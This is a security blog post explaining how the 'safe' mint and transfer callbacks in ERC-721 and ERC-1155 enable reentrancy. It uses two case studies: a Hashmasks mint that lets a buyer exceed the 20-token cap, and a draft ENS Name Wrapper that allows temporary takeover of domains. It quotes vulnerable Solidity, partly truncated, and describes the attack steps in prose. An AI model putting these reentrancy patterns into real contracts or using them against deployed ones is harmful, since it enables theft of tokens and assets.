The Dangers of Surprising Code

8.13.2021 | samczsun

If you work in software engineering, odds are you’ve heard of at least one software engineering principle. While I wouldn’t advocate for religiously following every principle to the letter, there are a few that are really worth paying attention to.

The one I want to talk about today is the principle of least astonishment. It has a fancy name but is a really simple idea. All it says is that when presented with code that claims to do something, most users will make assumptions regarding how it behaves to get that thing done. As such, your job as the developer is to write your code to match those assumptions so that your users don’t get a nasty surprise.

This is a good principle to follow because developers like making assumptions about things. If you export a function called calculateScore(GameState), a lot of people are going to rightly assume that the function will only read from the game state. If you also mutate the game state, you’ll surprise a lot of very confused people trying to figure out why their game state is randomly getting corrupted. Even if you put it in the documentation, there’s still no guarantee that people will see it, so it’s best to just ensure your code isn’t surprising in the first place.

Safer Is Better, Right?

When the ERC-721 standard was being drafted, back in the beginning of 2018, a suggestion was made to implement transfer security to ensure that tokens wouldn’t be stuck in recipient contracts that weren’t designed to handle them. To do this, the proposal authors modified the behavior of the transfer function to check the recipient for whether they were capable of supporting the token transfer. They also introduced the unsafeTransfer function which would bypass this check, should the sender so desire.

However, due to concerns about backwards compatibility, the functions were renamed in a subsequent commit. This made the transfer function behave the same for both an ERC-20 and an ERC-721 token. However, now the recipient checking needed to be moved elsewhere. As such, the safe class of functions was introduced: safeTransfer and safeTransferFrom.

This was a solution for a legitimate problem, as there have been numerous examples of ERC-20 tokens being accidentally transferred to contracts that never expected to receive tokens (one particularly common mistake was to transfer tokens to the token contract itself, locking it forever). It’s no surprise then that when the ERC-1155 standard was being drafted, it took inspiration from the ERC-721 standard by including recipient checks not only on transfer but on mint as well.

These standards mostly sat dormant for the next few years while ERC-20 maintained its popularity, but recently a spike in gas costs, as well as interest in NFTs, means that the ERC-721 and ERC-1155 standards have seen a spike in developer usage. With all this renewed interest, it sure is fortunate that these standards were designed with safety in mind, right?

Safer Is Better, Right?

Ok, but what exactly does it mean for a transfer or mint to be safe? Different parties have different interpretations of safety. For a developer, a safe function might mean that it doesn’t contain any bugs or introduce additional security concerns. For a user, it could mean that it contains additional guardrails to protect them from accidentally shooting themselves in the foot.

It turns out that in this case, these functions are more of the latter and less of the former. This is especially unfortunate because given the choice between transfer and safeTransfer, why wouldn’t you pick the safe one? It’s in the name!

Well, one reason might be our old friend reentrancy, or as I’ve been trying my hardest to rebrand it to: unsafe external calls. Recall that any external call is potentially unsafe if the recipient is attacker-controlled because the attacker may be able to cause your contract to transition into an undefined state. By design, these “safe” functions perform an external call to the recipient of the tokens, which is often controlled by the sender during a mint or transfer. In other words, this is practically a textbook example of an unsafe external call.

But, you might ask yourself, what’s the worst that could happen from allowing a recipient contract to reject a transfer that they weren’t able to process? Well, allow me to answer that question with two quick case studies.


Hashmasks are NFTs with a limited supply. Users were able to purchase up to 20 masks per transaction, although they’ve been sold out for months already. Here’s the function to buy masks:

function mintNFT(uint256 numberOfNfts) public payable {
    require(totalSupply() < MAX_NFT_SUPPLY, "Sale has already ended");
    require(numberOfNfts > 0, "numberOfNfts cannot be 0");
    require(numberOfNfts <= 20, "You may not buy more than 20 NFTs at once");
    require(totalSupply().add(numberOfNfts) <= MAX_NFT_SUPPLY, "Exceeds MAX_NFT_SUPPLY");
    require(getNFTPrice().mul(numberOfNfts) == msg.value, "Ether value sent is not correct");

    for (uint i = 0; i < numberOfNfts; i++) {
        uint mintIndex = totalSupply();
        if (block.timestamp < REVEAL_TIMESTAMP) {
            _mintedBeforeReveal[mintIndex] = true;
        _safeMint(msg.sender, mintIndex);

    * Source of randomness. Theoretical miner withhold manipulation possible but should be sufficient in a pragmatic sense
    if (startingIndexBlock == 0 && (totalSupply() == MAX_NFT_SUPPLY || block.timestamp >= REVEAL_TIMESTAMP)) {
        startingIndexBlock = block.number;

If you weren’t expecting it, then this function might seem perfectly reasonable. However, as you might have predicted, there’s something sinister hidden inside that _safeMint call. Let’s take a look.

    function _safeMint(address to, uint256 tokenId, bytes memory _data) internal virtual {
        _mint(to, tokenId);
        require(_checkOnERC721Received(address(0), to, tokenId, _data), "ERC721: transfer to non ERC721Receiver implementer");

For safety, this function performs a callback to the recipient of the token to check that they’re willing to accept the transfer. However, we’re the recipient of the token, which means we just got a callback at which point we can do whatever we like, including calling mintNFT again. If we do this, we’ll reenter the function after only one mask has been minted, which means we can request to mint another 19 masks. This results in a total of 39 masks being minted, even though the maximum allowable was only 20.

ENS Name Wrapper

More recently, Nick Johnson from ENS reached out about taking a look at their work-in-progress name wrapper for the ENS. The name wrapper allows users to tokenize their ENS domains in a new ERC-1155 token which provides support for fine-grained permissions and a more consistent API.

At a high level, in order to wrap an arbitrary ENS domain (more specifically, any domain that isn’t a 2LD .eth domain) you must first approve the name wrapper to access your ENS domain. Then you call wrap(bytes,address,uint96,address) which both mints an ERC-1155 token for you and also takes custody of the underlying ENS domain.

Here’s the wrap function itself, it’s fairly straightforward. First, we call _wrap which does some logic and returns the hashed domain name. Then we ensure that the transaction sender is indeed the owner of the ENS domain before taking custody of the domain. Note that if the sender does not own the underlying ENS domain, then the entire transaction should revert, undoing any changes made in _wrap.

    function wrap(
        bytes calldata name,
        address wrappedOwner,
        uint96 _fuses,
        address resolver
    ) public override {
        bytes32 node = _wrap(name, wrappedOwner, _fuses);
        address owner = ens.owner(node);

            owner == msg.sender ||
                isApprovedForAll(owner, msg.sender) ||
                ens.isApprovedForAll(owner, msg.sender),
            "NameWrapper: Domain is not owned by the sender"
        ens.setOwner(node, address(this));
        if (resolver != address(0)) {
            ens.setResolver(node, resolver);

Here’s the _wrap function itself. Nothing special going on in here.

    function _wrap(
        bytes memory name,
        address wrappedOwner,
        uint96 _fuses
    ) private returns (bytes32 node) {
        (bytes32 labelhash, uint256 offset) = name.readLabel(0);
        bytes32 parentNode = name.namehash(offset);

            parentNode != ETH_NODE,
            "NameWrapper: .eth domains need to use wrapETH2LD()"

        node = _makeNode(parentNode, labelhash);

        _mint(node, name, wrappedOwner, _fuses);
        emit NameWrapped(node, name, wrappedOwner, _fuses);

Unfortunately, it’s the _mint function itself where unsuspecting developers may be in for a nasty surprise. The ERC-1155 specification states that when minting a token, the recipient should be consulted for whether they’re willing to accept the token. Upon digging into the library code (which is lightly modified from the OpenZeppelin base), we see that this is indeed the case.

    function _mint(
        bytes32 node,
        bytes memory name,
        address wrappedOwner,
        uint96 _fuses
    ) internal {
        names[node] = name;

        address oldWrappedOwner = ownerOf(uint256(node));
        if (oldWrappedOwner != address(0)) {
            // burn and unwrap old token of old owner
            emit NameUnwrapped(node, address(0));
        _mint(node, wrappedOwner, _fuses);
    function _mint(
        bytes32 node,
        address newOwner,
        uint96 _fuses
    ) internal virtual {
        uint256 tokenId = uint256(node);
        address owner = ownerOf(tokenId);
        require(owner == address(0), "ERC1155: mint of existing token");
        require(newOwner != address(0), "ERC1155: mint to the zero address");
            newOwner != address(this),
            "ERC1155: newOwner cannot be the NameWrapper contract"
        _setData(tokenId, newOwner, _fuses);
        emit TransferSingle(msg.sender, address(0x0), newOwner, tokenId, 1);

But what good does this do for us, exactly? Well, once again we are presented with an unsafe external call that we can use to perform reentrancy. Specifically, notice that during the callback we own the ERC-1155 token representing the ENS domain, but the name wrapper hasn’t yet verified that we own the underlying ENS domain itself. This allows us to operate on the ENS domain without actually owning it in the first place. For example, we can ask the name wrapper to unwrap our domain, burning the token we just minted and getting the underlying ENS domain.

    function unwrap(
        bytes32 parentNode,
        bytes32 label,
        address newController
    ) public override onlyTokenOwner(_makeNode(parentNode, label)) {
            parentNode != ETH_NODE,
            "NameWrapper: .eth names must be unwrapped with unwrapETH2LD()"
        _unwrap(_makeNode(parentNode, label), newController);
    function _unwrap(bytes32 node, address newOwner) private {
            newOwner != address(0x0),
            "NameWrapper: Target owner cannot be 0x0"
            newOwner != address(this),
            "NameWrapper: Target owner cannot be the NameWrapper contract"
            !allFusesBurned(node, CANNOT_UNWRAP),
            "NameWrapper: Domain is not unwrappable"

        // burn token and fuse data
        ens.setOwner(node, newOwner);

        emit NameUnwrapped(node, newOwner);

Now that we have the underlying ENS domain, we can do whatever we want with it, such as register new subdomains or set the resolver. When we’re done, we just exit the callback. The name wrapper will fetch the current owner of the underlying ENS domain, which is us, and complete the transaction. Just like that, we’ve taken temporary ownership of any ENS domain the name wrapper is approved for and made arbitrary changes to it.


Code that’s surprising may break things in catastrophic ways. In both of these cases, developers who reasonably assumed that the safe class of functions would be (at least as) safe to use instead inadvertently increased their attack surface. As the ERC-721 and ERC-1155 standards become more popular and widespread, it is very likely that this will become an increasingly frequent occurrence. Developers will need to consider the risks of using the safe class of functions and determine how the external call might interact with the code they’ve written.

Written by:


Sam is a Research Partner focused on Paradigm’s portfolio companies and research into security and related topics. Previously, Sam was a security engineer at Trail of Bits where he worked [→]

Disclaimer: This post is for general information purposes only. It does not constitute investment advice or a recommendation or solicitation to buy or sell any investment and should not be used in the evaluation of the merits of making any investment decision. It should not be relied upon for accounting, legal or tax advice or investment recommendations. This post reflects the current opinions of the authors and is not made on behalf of Paradigm or its affiliates and does not necessarily reflect the opinions of Paradigm, its affiliates or individuals associated with Paradigm. The opinions reflected herein are subject 
to change without being updated.